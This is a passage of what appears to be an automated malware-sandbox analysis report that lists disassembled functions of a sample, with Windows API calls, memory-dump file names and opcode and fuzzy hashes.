                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 14a007ccf47c77533ddc24ce4f3f746d6fc3113936971377a44505935ba98a49
                                                                                                                                                                                                                                              • Instruction ID: d04815853a11d1f700b10ec76b7877ffa8b6b174d8f46bd7e84c72bad3a9ab26
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 14a007ccf47c77533ddc24ce4f3f746d6fc3113936971377a44505935ba98a49
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E7313E70E016189FCB10DF69CD80B5EB7B9AF89208F308596E429EB751D775E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF9118 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: c23d42e2a0dea704a5659a87f2abc184c32e91d36c90d37b5b068e0e4a954f01
                                                                                                                                                                                                                                              • Instruction ID: 78f2054570d9655a2f7b4642f6197d1b000dfc3ec1c444e07301b603c49d525b
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c23d42e2a0dea704a5659a87f2abc184c32e91d36c90d37b5b068e0e4a954f01
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7A314D71E016189FCB00CF68CC80B5EB7B9AF89208F30859AE429EB741DB71E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF92C5 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: bfc62e094fe13238e3ed20eb2b3d8e75545a82d7080bc72e4aaacd7361926b28
                                                                                                                                                                                                                                              • Instruction ID: 43aa89edcf1416c1df1545c16390e428bbe0eae36f21f9f861210abfa55d6422
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: bfc62e094fe13238e3ed20eb2b3d8e75545a82d7080bc72e4aaacd7361926b28
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 01312A70A016189FDB10DFA8C880B5EB7B9AF89208F30858AE429EB751D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF9237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: c40ccc1dfb6fc7316d807e6674e18c18139defca32ffe44de59857603035f3d8
                                                                                                                                                                                                                                              • Instruction ID: 0f4b69697edabf6ae67fa235980f5397d71080fbe2930ef11f80664cfbba60c8
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: c40ccc1dfb6fc7316d807e6674e18c18139defca32ffe44de59857603035f3d8
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 83313D70E016189FDB10DFA9CC80B5EB7B9AF89208F308586E529EB751D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEE7370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: _malloc.LIBCMT ref: 6CF39BCF
                                                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CF511FD,000000FF,?,6CEE8B80,00000000,?,00000000,?,6CEE8C13,?,?), ref: 6CEE7415
                                                                                                                                                                                                                                              • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CF511FD,000000FF,?,6CEE8B80,00000000,?,00000000,?,6CEE8C13,?,?), ref: 6CEE741B
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE743D
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE7452
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CEE7461
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CEE7476
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C04
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: std::exception::exception.LIBCMT ref: 6CF39C1E
                                                                                                                                                                                                                                                • Part of subcall function 6CF39BB5: __CxxThrowException@8.LIBCMT ref: 6CF39C2F
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 189561132-0
                                                                                                                                                                                                                                              • Opcode ID: b73a5c98ecb4e3a3a3bcb175589dfd23681b0f2464e57765e8799ac7eb95120f
                                                                                                                                                                                                                                              • Instruction ID: ee5c9db76b15d12ff2c1759459f12c6deaa700776ac04fda47ef801f9ff55304
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b73a5c98ecb4e3a3a3bcb175589dfd23681b0f2464e57765e8799ac7eb95120f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 65318BB2900A54AFCB50CF59C880A9AFBF4FF68300B54895EE94A87B01D731F604CBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: eab4653ac25476485cb78fb3b563302f246ec255b0f14a9545c1326735cf5e4c
                                                                                                                                                                                                                                              • Instruction ID: 1d5f556e88da849a2402e65cb472f7128d1a933f651f0907d62cb16d1019dbc3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: eab4653ac25476485cb78fb3b563302f246ec255b0f14a9545c1326735cf5e4c
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67312B70E416189FDB10DF69CC80B9EB7B9AF85208F34859AE429EB741C771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: f27df964d5b2ed547ed6a817c264074fd48cd8137da31fb84152b7ac7983cbcd
                                                                                                                                                                                                                                              • Instruction ID: cd7bf5165509786c1c6b0d6bbd2ebf0bbe02b3276db7bab6670b91b128048d05
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f27df964d5b2ed547ed6a817c264074fd48cd8137da31fb84152b7ac7983cbcd
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23313C71E016189FCB10CF69CC80B9EB7B9AF89204F74868AE429EB745D771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: 01bb872f15a0adb0d9ae84cd52a60b8f28614c4e353d9ba006000eefa409e6b9
                                                                                                                                                                                                                                              • Instruction ID: 5ed03cfd8c844903438fae116358210789242852c6fc62c77d8be4cb76b14562
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01bb872f15a0adb0d9ae84cd52a60b8f28614c4e353d9ba006000eefa409e6b9
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA313E70E016189FCB10DF69CC80B9DB7B9AF85204F74868AE429EB745C771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF8F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ArrayDestroySafe
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 4225690600-0
                                                                                                                                                                                                                                              • Opcode ID: d14e75621a70a28f7a71430954f95fe3748bc93ba1a1e601dce0b9024c575d28
                                                                                                                                                                                                                                              • Instruction ID: 3aa575918ed132b478a1cb13660f37795419aed6d9861df236ff580bcf35de5f
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d14e75621a70a28f7a71430954f95fe3748bc93ba1a1e601dce0b9024c575d28
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D5311A71A016189FDB10DB69CC80B9EB7B9AF85308F34869AE529EB741C771E981CF50
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEF884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE63
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE73
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE86
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAE99
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEAC
                                                                                                                                                                                                                                              • SafeArrayDestroy.OLEAUT32(?), ref: 6CEFAEBF
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
